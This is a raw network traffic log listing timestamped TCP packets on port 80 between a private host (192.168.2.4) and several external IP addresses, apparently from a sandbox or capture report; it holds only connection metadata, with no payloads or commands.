Jan 14, 2022 00:16:08.998720884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.998820066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999011993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999030113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999236107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999253035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999414921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999422073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999594927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:08.999603033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.016448975 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.016567945 CET	80	49905	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:09.016637087 CET	49905	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:09.016757965 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.024491072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.024671078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.024808884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.024955988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025029898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025165081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025274992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025429964 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025593042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.025806904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.026104927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.026303053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.026321888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.026923895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027072906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027281046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027297020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027484894 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027502060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027683973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027698040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027890921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.027906895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028063059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028079033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028162956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028348923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028364897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028537035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028553009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028729916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028743982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028914928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.028932095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029088974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029104948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029278994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029295921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029464960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029479027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029649019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029665947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029830933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.029846907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030015945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030035019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030193090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030206919 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030412912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030431032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030591965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030607939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030783892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030801058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030966043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.030982018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.031086922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.031248093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.031265020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033004045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033293009 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033309937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033575058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033588886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033838034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.033855915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034060001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034075975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034255981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034272909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034713030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034728050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034917116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.034935951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035098076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035114050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035283089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035299063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035471916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035485983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.035876036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036160946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036312103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036326885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036503077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036601067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036763906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.036990881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.037014961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.037821054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.038064957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.038081884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.038398027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.039661884 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039694071 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039721966 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039748907 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039772034 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039797068 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039823055 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039848089 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039874077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039899111 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039925098 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039952040 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039974928 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.039999008 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040023088 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040047884 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040072918 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040097952 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040828943 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040853977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040880919 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040935993 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040963888 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.040988922 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.041014910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.041042089 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.041068077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.042306900 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.042335033 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.042361975 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.042488098 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.042848110 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.046698093 CET	80	49907	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.049489975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.049510002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.049761057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.049776077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050004959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050021887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050174952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050270081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050517082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050532103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050766945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.050784111 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.052175999 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.052210093 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.052706957 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.052866936 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.053504944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.053566933 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.054364920 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.054394007 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.054445028 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056029081 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056060076 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056147099 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056423903 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056447983 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056548119 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056574106 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056906939 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.056979895 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.057169914 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.057660103 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.057900906 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.058104992 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.058219910 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.059273958 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.059458971 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.066513062 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.097119093 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.097167969 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.111520052 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.112320900 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.112447977 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.112636089 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.113076925 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.113765001 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.172689915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.172996044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.173013926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.173144102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.173676968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.173691988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.173877001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174048901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174065113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174334049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174350023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174581051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174597025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174818993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.174835920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175075054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175090075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175669909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175813913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175967932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.175987005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176110983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176287889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176305056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176456928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176565886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.176706076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.177160978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.177928925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.177946091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178116083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178129911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178298950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178314924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178481102 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178497076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178664923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178682089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178864002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.178879023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179049015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179064989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179234028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179249048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179419041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179435968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179600954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179615021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179785967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179802895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179966927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.179984093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180113077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180262089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180278063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180459023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180478096 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180641890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180656910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180828094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.180845022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.181005955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.181022882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.181210995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.265342951 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.265378952 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.265408039 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.265431881 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.265625954 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.265638113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.301712990 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.354154110 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.354254961 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.354367018 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.357156038 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.357969046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358103037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358352900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358365059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358520985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358603954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358725071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358963013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.358972073 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359208107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359220028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359399080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359616995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359628916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359724998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359889984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.359900951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360074043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360085011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360250950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360259056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360352993 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360444069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360541105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360615969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360801935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360810995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360982895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.360992908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361167908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361179113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361303091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361382961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361458063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361535072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361721039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361732960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.361866951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.416924953 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.416984081 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417026043 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417063951 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417083025 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.417109966 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417120934 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.417151928 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417191029 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417231083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417241096 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.417270899 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.417282104 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.417314053 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.418045044 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.419336081 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.420433998 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.421588898 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.421616077 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.426951885 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.447351933 CET	49904	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448441029 CET	49910	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448590994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448710918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448723078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448895931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.448904991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449007034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449064016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449230909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449239016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449413061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449419975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449513912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449589014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449666023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449774027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449922085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.449934006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450037003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.450114012 CET	49902	80	192.168.2.4	185.215.113.35
